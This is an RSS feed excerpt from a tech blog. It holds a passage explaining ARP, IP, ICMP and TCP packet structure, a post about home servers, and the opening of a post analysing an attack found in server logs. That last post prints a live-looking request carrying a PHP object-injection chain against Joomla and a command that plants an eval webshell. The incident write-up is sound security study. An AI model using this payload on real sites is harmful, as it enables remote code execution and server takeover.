    <td>hardware type (<code>0x0001</code> for Ethernet)</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>protocol type (<code>0x0800</code> for IP)</td>
  </tr>
  <tr>
    <td nowrap>1 byte</td>
    <td>hardware length (<code>0x06</code> for Ethernet, because the MAC address is 6 bytes long)</td>
  </tr>
  <tr>
    <td nowrap>1 byte</td>
    <td>protocol length (<code>0x04</code> for IP, because an IP (v4) address is 4 bytes long)</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>operation (<code>0x0001</code> is the request, <code>0x0002</code> is the response)</td>
  </tr>
  <tr>
    <td nowrap>6 bytes</td>
    <td>sender's hardware address</td>
  </tr>
  <tr>
    <td nowrap>4 bytes</td>
    <td>sender's protocol address</td>
  </tr>
  <tr>
    <td nowrap>6 bytes</td>
    <td>recipient's hardware address</td>
  </tr>
  <tr>
    <td nowrap>4 bytes</td>
    <td>recipient's protocol address</td>
  </tr>
</tbody>
</table>
<p>Let's add IP addresses to the above diagram and see a concrete example of a request and response.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/lan2.png" width="480" height="420" alt="" title="" loading="lazy" />
</p>

<p>Say Alice wants to ping Bob, so she asks which MAC address the IP address <code>192.168.1.103</code> belongs to. The request (the green part belongs to the Ethernet frame, the blue part to the ARP request):</p>
<table>
<tbody>
  <tr class="green">
    <td><code>0xFFFFFFFFFFFF</code></td>
    <td>recipient (everybody)</td>
  </tr>
  <tr class="green">
    <td><code>0x0A0000000002</code></td>
    <td>sender (Alice)</td>
  </tr>
  <tr class="green">
    <td><code>0x0806</code></td>
    <td>ARP type of data</td>
  </tr>
  <tr class="blue">
    <td><code>0x0001</code></td>
    <td>Ethernet hardware</td>
  </tr>
  <tr class="blue">
    <td><code>0x0800</code></td>
    <td>IP protocol</td>
  </tr>
  <tr class="blue">
    <td><code>0x06</code></td>
    <td>MAC address is 6 bytes long</td>
  </tr>
  <tr class="blue">
    <td><code>0x04</code></td>
    <td>IP address is 4 bytes long</td>
  </tr>
  <tr class="blue">
    <td><code>0x0001</code></td>
    <td>it's a request packet</td>
  </tr>
  <tr class="blue">
    <td><code>0x0A0000000002</code></td>
    <td>sender's (Alice) MAC address</td>
  </tr>
  <tr class="blue">
    <td><code>0xC0A80166</code></td>
    <td>sender's (Alice) IP address</td>
  </tr>
  <tr class="blue">
    <td><code>0x000000000000</code></td>
    <td>recipient's (Bob) MAC address</td>
  </tr>
  <tr class="blue">
    <td><code>0xC0A80167</code></td>
    <td>recipient's (Bob) IP address</td>
  </tr>
  <tr class="green">
    <td><code>0x????????</code></td>
    <td>checksum</td>
  </tr>
</tbody>
</table>
<p>The IP addresses are in hexadecimal format (<a href="https://gchq.github.io/CyberChef/#recipe=Change_IP_format(&#x27;Dotted%20Decimal&#x27;,&#x27;Hex&#x27;)&amp;input=MTkyLjE2OC4xLjEwMw">CyberChef is a nice tool for converting</a> them). In a request packet, the recipient's MAC address in the ARP part can be anything; its value is ignored.</p>
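<p>The conversion and the byte layout can also be reproduced in a few lines of bash. A minimal sketch (the function names are made up) that builds the hex dump of Alice's ARP request from the table above, without the checksum:</p>

```shell
#!/bin/bash
# Convert a dotted-decimal IPv4 address to the hex notation used in the tables
ip_to_hex() {
    local IFS=.
    local -a o
    read -r -a o <<< "$1"
    printf '%02X%02X%02X%02X\n' "${o[@]}"
}

# Hex dump of an ARP request: Ethernet header followed by the ARP message.
# Arguments: sender MAC (12 hex digits), sender IP, the IP we are looking for.
arp_request() {
    local sender_mac=$1 sender_ip target_ip
    sender_ip=$(ip_to_hex "$2")
    target_ip=$(ip_to_hex "$3")
    # Ethernet header: broadcast recipient, sender MAC, type 0x0806 (ARP)
    printf 'FFFFFFFFFFFF%s0806' "$sender_mac"
    # ARP: Ethernet (0001), IP (0800), lengths 6 and 4, request (0001)
    printf '0001080006040001'
    # Sender MAC and IP, unknown recipient MAC (zeros), recipient IP
    printf '%s%s000000000000%s\n' "$sender_mac" "$sender_ip" "$target_ip"
}
```

<p>Running <code>arp_request 0A0000000002 192.168.1.102 192.168.1.103</code> gives 42 bytes (84 hex digits): 14 bytes of Ethernet header and 28 bytes of ARP message. Since the data part of an Ethernet frame must be at least 46 bytes, a real frame would also be padded with zeros before the checksum.</p>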
<p>Bob receives this request and since his IP address is <code>192.168.1.103</code>, he sends a reply:</p>
<table>
<tbody>
  <tr class="green">
    <td><code>0x0A0000000002</code></td>
    <td>recipient (Alice)</td>
  </tr>
  <tr class="green">
    <td><code>0x0A0000000003</code></td>
    <td>sender (Bob)</td>
  </tr>
  <tr class="green">
    <td><code>0x0806</code></td>
    <td>ARP type of data</td>
  </tr>
  <tr class="blue">
    <td><code>0x0001</code></td>
    <td>Ethernet hardware</td>
  </tr>
  <tr class="blue">
    <td><code>0x0800</code></td>
    <td>IP protocol</td>
  </tr>
  <tr class="blue">
    <td><code>0x06</code></td>
    <td>MAC address is 6 bytes long</td>
  </tr>
  <tr class="blue">
    <td><code>0x04</code></td>
    <td>IP address is 4 bytes long</td>
  </tr>
  <tr class="blue">
    <td><code>0x0002</code></td>
    <td>it's a response packet</td>
  </tr>
  <tr class="blue">
    <td><code>0x0A0000000003</code></td>
    <td>sender's (Bob) MAC address</td>
  </tr>
  <tr class="blue">
    <td><code>0xC0A80167</code></td>
    <td>sender's (Bob) IP address</td>
  </tr>
  <tr class="blue">
    <td><code>0x0A0000000002</code></td>
    <td>recipient's (Alice) MAC address</td>
  </tr>
  <tr class="blue">
    <td><code>0xC0A80166</code></td>
    <td>recipient's (Alice) IP address</td>
  </tr>
  <tr class="green">
    <td><code>0x????????</code></td>
    <td>checksum</td>
  </tr>
</tbody>
</table>
<p>Here again, the question arises, what happens if Bob is not the only one who replies to the request, but the evil Mallory as well? Could Alice be sending her messages for Bob to the wrong place?</p>
<p>The devices have something called an ARP cache, which holds the IP address - MAC address mappings so that you don't have to ask every time. For Alice, it might look something like this:</p>
<pre class="console"><code>$ ip -br neigh
192.168.1.103                           eth0             0a:00:00:00:00:03
192.168.1.104                           eth0             0a:00:00:00:00:04
192.168.1.1                             eth0             0a:00:00:00:00:01
</code></pre>
<p>This cache is also updated when an ARP response is received without being requested, which means that if Mallory starts flooding the network with fake ARP responses (telling Alice that he is the router, and telling the router that he is Alice), and forwards the packets passing through him to their original recipients, he can intercept (or even alter) Alice's Internet traffic without Alice noticing anything.</p>
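<p>One symptom of such an attack is visible in Alice's ARP cache: the router's IP address and Mallory's own IP address end up mapped to the same MAC address. A rough heuristic sketch (the <code>duplicate_macs</code> function is hypothetical) that reports such MAC addresses; note that a device that legitimately has several IP addresses triggers it too:</p>

```shell
#!/bin/bash
# Read "IP dev MAC" lines (the ip -br neigh format above) on stdin and print
# every MAC address that belongs to more than one IP address.
duplicate_macs() {
    awk '
        NF >= 3 { count[$3]++; ips[$3] = ips[$3] " " $1 }
        END {
            for (mac in count)
                if (count[mac] > 1) printf "%s ->%s\n", mac, ips[mac]
        }
    '
}
```

<p>It could be fed with something like <code>ip -br neigh | duplicate_macs</code>; entries without a MAC address (for example, failed lookups) are skipped.</p>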
<h4>Internet Protocol</h4>
<p>The next protocol is IP, which finally gives us IP addresses and the ability to exchange data between two IP addresses. The IP packet structure:</p>
<table>
<tbody>
  <tr>
    <td nowrap>4 bits</td>
    <td>version (<code>0b0100</code> for IPv4)</td>
  </tr>
  <tr>
    <td nowrap>4 bits</td>
    <td>header size in 4-byte words (usually <code>0b0101</code>, i.e. 20 bytes)</td>
  </tr>
  <tr>
    <td nowrap>8 bits</td>
    <td>various settings (DSCP and ECN) I don't quite understand; we can send <code>0b00000000</code>, that wouldn't hurt :)</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>size of the whole packet</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>identification (for grouping message fragments)</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>flags and fragment offset (an IP packet we want to send may be too big for an Ethernet frame, so we need to split it into multiple fragments), by default it's <code>0x0000</code></td>
  </tr>
  <tr>
    <td nowrap>1 byte</td>
    <td>TTL (time-to-live), each router that forwards the packet decreases it by one; if it reaches zero, the router drops the packet</td>
  </tr>
  <tr>
    <td nowrap>1 byte</td>
    <td>protocol used in the data (<code>0x01</code> for ICMP, <code>0x06</code> for TCP, <code>0x11</code> for UDP)</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>checksum</td>
  </tr>
  <tr>
    <td nowrap>4 bytes</td>
    <td>sender's IP address</td>
  </tr>
  <tr>
    <td nowrap>4 bytes</td>
    <td>recipient's IP address</td>
  </tr>
  <tr>
    <td nowrap>&nbsp;</td>
    <td>data</td>
  </tr>
</tbody>
</table>
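<p>The header checksum is the one's complement of the one's complement sum of the header's 16-bit words, calculated with the checksum field set to zero (RFC 1071); ICMP uses the same algorithm over its own message. A minimal bash sketch (<code>inet_checksum</code> is a made-up name) that takes the words in hex:</p>

```shell
#!/bin/bash
# Internet checksum over a list of 16-bit words given in hex.
# Pass the checksum field itself as 0000 when computing it.
inet_checksum() {
    local sum=0 word
    for word in "$@"; do
        sum=$(( sum + 16#$word ))
    done
    # Fold the carries above 16 bits back into the lower 16 bits
    while (( sum >> 16 )); do
        sum=$(( (sum & 0xFFFF) + (sum >> 16) ))
    done
    # One's complement of the folded sum
    printf '%04x\n' $(( ~sum & 0xFFFF ))
}
```

<p>For a sample header of a UDP packet from <code>192.168.0.1</code> to <code>192.168.0.199</code>, <code>inet_checksum 4500 0073 0000 4000 4011 0000 c0a8 0001 c0a8 00c7</code> prints <code>b861</code>. Running it again with <code>b861</code> in the checksum position prints <code>0000</code>, which is how the recipient can verify the header.</p>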
<h4>Internet Control Message Protocol</h4>
<p>Since we mentioned ping earlier, we should mention ICMP. It's a strange beast: it belongs to the network layer, but it feels like it should be in the transport layer. It's wrapped into an IP packet in the same way as UDP or TCP, only it's not used for data transport. In the case of ping, the message is structured somewhat like this:</p>
<table>
<tbody>
  <tr>
    <td nowrap>1 byte</td>
    <td>type (<code>0x08</code> is ping request, <code>0x00</code> is ping response)</td>
  </tr>
  <tr>
    <td nowrap>1 byte</td>
    <td>code (not used in case of ping)</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>checksum</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>identifier (to pair a request with a response)</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>sequence number (to pair a request with a response)</td>
  </tr>
  <tr>
    <td nowrap>&nbsp;</td>
    <td>optional data</td>
  </tr>
</tbody>
</table>
<p>Alice already knows Bob's MAC address, so she can finally send the ping she originally wanted, which Bob can then reply to. The request looks something like this (the green part is for the Ethernet frame, the blue part is the IP packet, the red part is ICMP):</p>
<table>
<tbody>
  <tr class="green">
    <td><code>0x0A0000000003</code></td>
    <td>recipient's MAC address (Bob)</td>
  </tr>
  <tr class="green">
    <td><code>0x0A0000000002</code></td>
    <td>sender's MAC address (Alice)</td>
  </tr>
  <tr class="green">
    <td><code>0x0800</code></td>
    <td>IP type data</td>
  </tr>
  <tr class="blue">
    <td><code>0b01000101</code></td>
    <td>version and header size</td>
  </tr>
  <tr class="blue">
    <td><code>0b00000000</code></td>
    <td>settings we don't care about</td>
  </tr>
  <tr class="blue">
    <td><code>0x????</code></td>
    <td>the size of the full packet</td>
  </tr>
  <tr class="blue">
    <td><code>0x????</code></td>
    <td>identifier</td>
  </tr>
  <tr class="blue">
    <td><code>0x0000</code></td>
    <td>splitting related data</td>
  </tr>
  <tr class="blue">
    <td><code>0xFF</code></td>
    <td>TTL</td>
  </tr>
  <tr class="blue">
    <td><code>0x01</code></td>
    <td>ICMP packet</td>
  </tr>
  <tr class="blue">
    <td><code>0x????</code></td>
    <td>checksum</td>
  </tr>
  <tr class="blue">
    <td><code>0xC0A80166</code></td>
    <td>sender's IP address (Alice)</td>
  </tr>
  <tr class="blue">
    <td><code>0xC0A80167</code></td>
    <td>recipient's IP address (Bob)</td>
  </tr>
  <tr class="red">
    <td><code>0x08</code></td>
    <td>ping request type</td>
  </tr>
  <tr class="red">
    <td><code>0x00</code></td>
    <td>unused data</td>
  </tr>
  <tr class="red">
    <td><code>0x????</code></td>
    <td>checksum</td>
  </tr>
  <tr class="red">
    <td><code>0x????</code></td>
    <td>identifier</td>
  </tr>
  <tr class="red">
    <td><code>0x????</code></td>
    <td>sequence number</td>
  </tr>
  <tr class="green">
    <td><code>0x????????</code></td>
    <td>checksum</td>
  </tr>
</tbody>
</table>
<p>To which Bob sends the following reply:</p>
<table>
<tbody>
  <tr class="green">
    <td><code>0x0A0000000002</code></td>
    <td>recipient's MAC address (Alice)</td>
  </tr>
  <tr class="green">
    <td><code>0x0A0000000003</code></td>
    <td>sender's MAC address (Bob)</td>
  </tr>
  <tr class="green">
    <td><code>0x0800</code></td>
    <td>IP type data</td>
  </tr>
  <tr class="blue">
    <td><code>0b01000101</code></td>
    <td>version and header size</td>
  </tr>
  <tr class="blue">
    <td><code>0b00000000</code></td>
    <td>settings we don't care about</td>
  </tr>
  <tr class="blue">
    <td><code>0x????</code></td>
    <td>the size of the full packet</td>
  </tr>
  <tr class="blue">
    <td><code>0x????</code></td>
    <td>identifier</td>
  </tr>
  <tr class="blue">
    <td><code>0x0000</code></td>
    <td>splitting related data</td>
  </tr>
  <tr class="blue">
    <td><code>0xFF</code></td>
    <td>TTL</td>
  </tr>
  <tr class="blue">
    <td><code>0x01</code></td>
    <td>ICMP packet</td>
  </tr>
  <tr class="blue">
    <td><code>0x????</code></td>
    <td>checksum</td>
  </tr>
  <tr class="blue">
    <td><code>0xC0A80167</code></td>
    <td>sender's IP address (Bob)</td>
  </tr>
  <tr class="blue">
    <td><code>0xC0A80166</code></td>
    <td>recipient's IP address (Alice)</td>
  </tr>
  <tr class="red">
    <td><code>0x00</code></td>
    <td>ping response type</td>
  </tr>
  <tr class="red">
    <td><code>0x00</code></td>
    <td>unused data</td>
  </tr>
  <tr class="red">
    <td><code>0x????</code></td>
    <td>checksum</td>
  </tr>
  <tr class="red">
    <td><code>0x????</code></td>
    <td>identifier (what Alice sent)</td>
  </tr>
  <tr class="red">
    <td><code>0x????</code></td>
    <td>sequence number (what Alice sent)</td>
  </tr>
  <tr class="green">
    <td><code>0x????????</code></td>
    <td>checksum</td>
  </tr>
</tbody>
</table>
<p>It's getting complicated, and we are far from the end. Did you notice that there was no mention of ports? That wasn't a mistake: at this level, the concept of a port doesn't exist yet, so it's time for us to move up yet another level.</p>
<h3>Transport layer</h3>
<p>If you've ever opened sockets in any programming language, you'll be familiar with the protocols found here. Let's start with the easy one.</p>
<h4>User Datagram Protocol</h4>
<p>As mentioned above, UDP is the easier one. There's no guarantee that the packet will arrive, no retransmission for lost packets, you just yell into one end of the pipe and hope that the other end will hear it. A packet looks like this:</p>
<table>
<tbody>
  <tr>
    <td nowrap>2 bytes</td>
    <td>sender's port</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>recipient's port</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>the full size of the packet</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>checksum</td>
  </tr>
  <tr>
    <td nowrap>&nbsp;</td>
    <td>optional data</td>
  </tr>
</tbody>
</table>
<p>The sender's port is optional as well: zero means it's not used; otherwise, responses are expected on that port.</p>
<h4>Transmission Control Protocol</h4>
<p>And this brings us to the famous and popular TCP. The cornerstone of the pack-everything-in-your-browser-and-serve-it-over-HTTP-based Internet. At least until the wide adoption of HTTP/3, which runs over QUIC on top of UDP. A packet looks like this:</p>
<table>
<tbody>
  <tr>
    <td nowrap>2 bytes</td>
    <td>sender's port</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>recipient's port</td>
  </tr>
  <tr>
    <td nowrap>4 bytes</td>
    <td>sequence number</td>
  </tr>
  <tr>
    <td nowrap>4 bytes</td>
    <td>acknowledgment number</td>
  </tr>
  <tr>
    <td nowrap>4 bits</td>
    <td>header size (the number of 4 byte blocks)</td>
  </tr>
  <tr>
    <td nowrap>4 bits</td>
    <td>reserved, unused bits</td>
  </tr>
  <tr>
    <td nowrap>8 bits</td>
    <td>flags (<code>SYN</code>, <code>FIN</code>, <code>ACK</code>, <code>URG</code> and the others)</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>window size</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>checksum</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>offset for the last urgent data byte (if the packet is <code>URG</code>)</td>
  </tr>
  <tr>
    <td nowrap>&nbsp;</td>
    <td>optional settings</td>
  </tr>
  <tr>
    <td nowrap>&nbsp;</td>
    <td>optional data</td>
  </tr>
</tbody>
</table>
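<p>It's not just the structure of the packet that is important, but also the little dance that the client and the server do to exchange data. The connection must be established and closed, and both parties have to acknowledge that they have received the data sent by the other. (The sequence numbers below are relative: in practice, each side starts from a random initial sequence number, and tools like Wireshark show the numbers relative to it.)</p>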
<h5>Establishing a connection</h5>
<ol>
<li>the client sends a <code>SYN</code> packet<br />
(the sequence number is 0, as this is the first packet from the client)</li>
<li>the server replies with a <code>SYN</code>, <code>ACK</code> packet<br />
(the sequence number is 0, as this is the first packet from the server; the acknowledgment number is 1, as the sequence number received before was 0, and although no data was included, the <code>SYN</code> flag itself counts as one byte, so the next packet is expected to have the sequence number 1)</li>
<li>the client responds with an <code>ACK</code> packet<br />
(the sequence number is 1, the acknowledgment number is 1)</li>
</ol>
<h5>Data exchange</h5>
<ol>
<li>the client sends 10 bytes of data<br />
(the sequence number is 1)</li>
<li>the server replies with an <code>ACK</code> packet<br />
(the sequence number is 1, and the acknowledgment number is 11 since the previous sequence number was 1 and 10 bytes of data were received)</li>
<li>the server sends 100 bytes of data<br />
(the sequence number is 1)</li>
<li>the client replies with an <code>ACK</code> packet<br />
(the sequence number is 11, the acknowledgment number is 101)</li>
</ol>
<h5>Closing the connection</h5>
<ol>
<li>the client sends a <code>FIN</code> packet<br />
(the sequence number is 11)</li>
<li>the server replies with a <code>FIN</code>, <code>ACK</code> packet<br />
(the sequence number is 101, and the acknowledgment number is 12, as the <code>FIN</code> flag also counts as one byte)</li>
<li>the client replies with an <code>ACK</code> packet<br />
(the sequence number is 12, and the acknowledgment number is 102)</li>
</ol>
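<p>The rule behind these numbers: the acknowledgment number is the received sequence number plus the number of data bytes, plus one if the <code>SYN</code> or <code>FIN</code> flag is set. A minimal sketch (<code>next_ack</code> is a made-up helper; real sequence numbers also wrap around at 2<sup>32</sup>):</p>

```shell
#!/bin/bash
# Acknowledgment number for a received segment.
# Arguments: sequence number, payload length in bytes, flags (e.g. "SYN,ACK").
next_ack() {
    local seq=$1 len=$2 flags=${3:-} extra=0
    # SYN and FIN each consume one sequence number, even without data
    case "$flags" in
        *SYN*|*FIN*) extra=1 ;;
    esac
    # Sequence numbers are 32-bit and wrap around
    echo $(( (seq + len + extra) & 0xFFFFFFFF ))
}
```

<p>For example, <code>next_ack 0 0 SYN</code> gives 1, <code>next_ack 1 10</code> gives 11, and <code>next_ack 101 0 FIN,ACK</code> gives 102, matching the steps above.</p>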
<h3>Application layer</h3>
<p>We elegantly skip two layers, the session layer and the presentation layer. The session layer contains the SOCKS protocol for example, and the scope of the presentation layer often merges with the application layer.</p>
<p>The application layer can be, for example, HTTP. Using the knowledge gained above, let's see what happens when Alice runs a simple <code>curl www.example.org</code> command.</p>
<p>To answer that, we need to know Alice's network settings. Suppose something like this is configured:</p>
<pre><code>auto eth0
iface eth0 inet static
      address 192.168.1.102
      netmask 255.255.255.0
      gateway 192.168.1.1
      dns-nameservers 1.1.1.1
</code></pre>
<ul>
<li>we can't do anything with the <code>www.example.org</code> domain name directly; we need an IP address</li>
<li>the configured DNS server's IP address is not on the local network, so the request has to be sent to the router (gateway)</li>
<li>send an ARP request to find out the MAC address of the router</li>
<li>send a UDP packet to the MAC address of the router, with the DNS server's IP address as the destination in the IP packet</li>
<li>the router sees that it is not the recipient, so it forwards the packet to the Internet (NAT and connection tracking are also involved here, so that the router's public IP address appears as the sender on the way out, and the router knows who to forward the reply to)</li>
<li>a reply UDP packet arrives from the Internet, and the router sees that it is not the recipient</li>
<li>thanks to connection tracking, the router knows where to forward the packet</li>
<li>the router forwards the UDP packet to Alice</li>
<li>the reply says that the IP address of <code>www.example.org</code> is <code>X.X.X.X</code></li>
<li>establish a TCP connection and make an HTTP request</li>
<li>the address <code>X.X.X.X</code> is not on the local network, so the TCP packets are sent to the MAC address of the router with the corresponding destination IP address</li>
<li>reply packets are forwarded by the router to Alice</li>
<li>close the TCP connection</li>
<li>ARP requests are probably not needed at this point, because the router's MAC address is already in the ARP cache</li>
</ul>
<p>Another question that may arise is how to know that an IP address is not on the local network. From the <code>address</code>/<code>netmask</code>/<code>gateway</code> settings above, a routing table is generated that looks something like this:</p>
<pre class="console"><code>$ sudo route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    0      0        0 eth0
192.168.1.0     0.0.0.0         255.255.255.0   U     0      0        0 eth0
</code></pre>
<p>Linux picks the most specific route that matches the destination (this is called longest prefix match), but the point is: if the destination is in the range <code>192.168.1.0</code>-<code>192.168.1.255</code>, the packet is simply sent out to the MAC address of the destination itself; for all other IP addresses, it is sent to the MAC address associated with the IP address <code>192.168.1.1</code>. The router has a similar routing table to decide what to do with the incoming packets.</p>
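<p>The "most specific route wins" rule is easy to sketch with Python's standard <code>ipaddress</code> module. This is a simplified model of the routing table above, not how the kernel actually stores or searches it; <code>ROUTES</code> and <code>next_hop</code> are names made up for this example, and <code>203.0.113.10</code> is just a documentation address standing in for <code>X.X.X.X</code>:</p>
<pre><code class="hljs python">import ipaddress

# (destination network, gateway or None for "directly connected", interface)
ROUTES = [
    (ipaddress.ip_network("0.0.0.0/0"), "192.168.1.1", "eth0"),
    (ipaddress.ip_network("192.168.1.0/255.255.255.0"), None, "eth0"),
]


def next_hop(destination: str):
    """Return (next-hop IP, interface) using longest prefix match."""
    address = ipaddress.ip_address(destination)
    # Keep only the routes whose network contains the destination address...
    matches = [route for route in ROUTES if address in route[0]]
    # ...and pick the most specific one (the longest prefix).
    _network, gateway, iface = max(matches, key=lambda route: route[0].prefixlen)
    # Directly connected: the packet goes to the destination's own MAC address.
    # Otherwise it goes to the MAC address of the gateway.
    return (gateway or destination, iface)


print(next_hop("192.168.1.50"))   # on the local network
print(next_hop("203.0.113.10"))   # anywhere else: via the router
</code></pre>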
<h3>Summary</h3>
<p>I hope I have managed to give you a glimpse of what happens &quot;underneath&quot; us when we use the Internet. A lot is going on across many layers, and we have only managed to scratch the surface.</p>
<p>We didn't even get very far, just ventured as far as the router. What's beyond that... is a world of its own, with things like DSL, SDH, PPP, MPLS, BGP, OSPF, and a bunch of other acronyms I don't even know about. And yet, in most cases, our packets get to the right recipients. What is this if not magic?</p>

]]></content:encoded>
        </item>
            <item>
            <title>Server in the house</title>
            <link>https://deadlime.hu/en/2023/08/04/server-in-the-house/</link>
            <pubDate>Fri, 04 Aug 2023 19:35:00 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">af50d997907b6577c691d4d01a284a84</guid>
            <description>Servers can also work from home</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/home_servers.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Somehow I've always been attracted to the idea of having a home server. The first one was an ancient desktop PC with a retro gray case on which we installed Debian. It was the start of my journey with Linux. Later, I snatched up a used Dell OptiPlex GX240, which lasted until the Raspberry Pi Model B came out. From then on, I used a Raspberry Pi as a home server for quite a long time, always upgrading to the latest model.</p>
<p>But ARM-based systems have their own problems. Some things didn't work, some packages were missing, and others needed cross-compiling. Not to mention that the Raspberry Pi is not a powerhouse either. I had my eye on the x86 architecture for a while, especially the <a href="https://www.intel.com/content/www/us/en/products/details/nuc.html">Intel NUC</a> product line, but in the end, I moved my home server needs to cloud servers.</p>
<p>At some point, <a href="https://deadlime.hu/en/2022/06/07/migration-and-madness/">I moved down from the cloud</a> and currently have three servers running at home.</p>
<h3>File server</h3>
<p>A descendant of the old Raspberry Pi servers: a Raspberry Pi 4 Model B with 4 GB of RAM. Later I attached a 4 TB external drive to it, and since then it has been used mainly as a file server with Samba. It also runs <a href="https://syncthing.net/">Syncthing</a>, which I use for file synchronization between my machines.</p>
<p>It also has a partner in crime, a similar Raspberry Pi 4 Model B (probably with 4 GB of RAM as well, but I'm too lazy to check) running <a href="https://libreelec.tv/">LibreELEC</a> to make the TV smarter, but I wouldn't count that as a server.</p>
<h3>The old router</h3>
<p>At one point, I came across a lot of articles about how cool it is to build your own router from PC parts. So I built one in <a href="https://en.wikipedia.org/wiki/Mini-ITX">Mini-ITX</a> size:</p>
<ul>
<li><a href="https://www.chieftec.eu/products-detail/88/IX-03B-OP">Chieftec IX-03B-OP</a> case</li>
<li><a href="https://www.gigabyte.com/Motherboard/GA-N3160N-D3V-rev-10">Gigabyte GA-N3160N-D3V</a> motherboard</li>
<li><a href="https://ark.intel.com/content/www/us/en/ark/products/91831/intel-celeron-processor-n3160-2m-cache-up-to-2-24-ghz.html">Intel Celeron N3160</a> integrated CPU</li>
<li>8 GB RAM</li>
<li>SATA SSD</li>
<li>passive cooling</li>
</ul>
<p>It was really cool and I learned a lot, but after a while, it became too much of a hassle. I switched back to a normal router, but I kept the machine, and a few services still run on it. It has a recursive DNS resolver that also works as a DNS-based ad blocker (like <a href="https://pi-hole.net/">Pi-hole</a>, but homemade) and a <a href="https://deadlime.hu/en/2020/09/23/diskless-raspberry-pi/">TFTP/NFS server for the Raspberry Pi with LibreELEC</a>. It had an OpenVPN server as well, but I started migrating it to WireGuard and never finished, so now I have neither.</p>
<h3>Application server</h3>
<p>The old router wasn't meant to be a powerful machine, so I needed something else to run applications on. I really liked the Mini-ITX form factor, so I put together a little box similar to the router:</p>
<ul>
<li>the same Chieftec IX-03B-OP case</li>
<li><a href="https://www.asus.com/motherboards-components/motherboards/prime/prime-h410i-plus/">Asus PRIME H410I-PLUS</a> motherboard</li>
<li><a href="https://www.intel.com/content/www/us/en/products/sku/199283/intel-core-i310100-processor-6m-cache-up-to-4-30-ghz/specifications.html">Intel Core i3-10100</a> CPU</li>
<li>16 GB RAM</li>
<li>NVMe SSD</li>
<li>active cooling</li>
</ul>
<p>The machine is running a Docker Swarm, with Portainer and Traefik (<a href="https://deadlime.hu/en/2022/06/07/migration-and-madness/">details in the moving post</a>). I tried out many things on it (Elastic Stack, Nextcloud, an MQTT server for sensors). Currently, it only runs a GitLab instance (Git server, container/package registry, build server) and a MediaWiki. Maybe I could replace the latter with GitLab's built-in wiki as well.</p>
<p>And I think that's it. I hope you've been inspired and are already planning your new server. If you're just starting out on the (not particularly) bumpy road of home server ownership, a Raspberry Pi with the official Raspberry Pi OS Lite might be a good place to start (if it isn't out of stock). It's relatively cheap, well-supported hardware that can handle quite a few self-hosted applications. Then, as you run into its shortcomings along the way, you can look for alternative solutions.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Advanced code reuse</title>
            <link>https://deadlime.hu/en/2023/07/14/advanced-code-reuse/</link>
            <pubDate>Fri, 14 Jul 2023 15:22:47 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[security]]></category>
                    <category><![CDATA[PHP]]></category>
                    <category><![CDATA[MySQL]]></category>
                    
            <guid isPermaLink="false">c592525aae62e7b1c54fc565326a76a6</guid>
            <description>You&#039;d never guess what a little creativity could do with old, boring classes</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/hacker.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Years ago I gave an in-house talk about a vulnerability that's so tangled, so improbable, that it still amazes me to this day.</p>
<p>It all started with a remarkably strange line in the web server logs. You could find a lot of strange lines in the logs of a web server connected to the public Internet, but remarkably strange ones...</p>
<pre class="console-wrap"><code>192.0.2.1 - - [16/Oct/2018:17:33:48 +0000] &quot;GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1&quot; 301 178 &quot;-&quot; &quot;}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:46:\x22eval($_REQUEST[1]);JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86&quot;
</code></pre>
<p>There are two interesting parts to this request: the data in the GET parameter (named <code>1</code>) and the value of the user agent (the part between quotes at the end). Let's look at the GET parameter first.</p>
<h3>Remote access</h3>
